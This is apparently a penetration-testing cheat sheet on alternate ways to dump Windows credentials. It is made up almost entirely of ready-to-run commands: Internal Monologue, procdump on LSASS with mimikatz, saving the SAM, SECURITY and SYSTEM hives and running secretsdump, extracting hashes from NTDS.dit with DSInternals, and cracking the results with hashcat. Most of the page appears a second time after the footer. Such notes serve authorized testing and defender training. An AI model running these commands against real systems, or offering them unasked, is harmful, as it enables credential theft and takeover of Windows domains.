Alternate Cred Dumps

Internal Monologue

Internal monologue is a way of dumping creds without touching LSASS.

Using Internal Monologue

execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]

Cracking Returned Hashes

hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force

Procdump + Mimikatz

# Dump with sysinternal windows signed binary 
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords 

# Viewing dump with invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'

Reg SAM / Security / System

reg save hklm\system system
reg save hklm\security security 
reg save hklm\sam sam

# Extract
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking MS-Cachev2 hashes recovered
Make the this format:
$DCC2$10240#username#hash

Crack:
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Offline DCSync

# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need DSInternals PowerShell module. This can be moved across machines.

# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
 
# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
 
# Extract Hashes from NTDS.dit in a dcsync format
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII

# File can then be cracked, used as normal DCSync would.

PreviousMimikatz NextMSSQL

Last updated 4 years ago

Was this helpful?

Procdump + Mimikatz

# Dump with sysinternal windows signed binary 
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords 

# Viewing dump with invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'

Reg SAM / Security / System

reg save hklm\system system
reg save hklm\security security 
reg save hklm\sam sam

# Extract
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking MS-Cachev2 hashes recovered
Make the this format:
$DCC2$10240#username#hash

Crack:
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Offline DCSync

# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need DSInternals PowerShell module. This can be moved across machines.

# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
 
# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
 
# Extract Hashes from NTDS.dit in a dcsync format
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII

# File can then be cracked, used as normal DCSync would.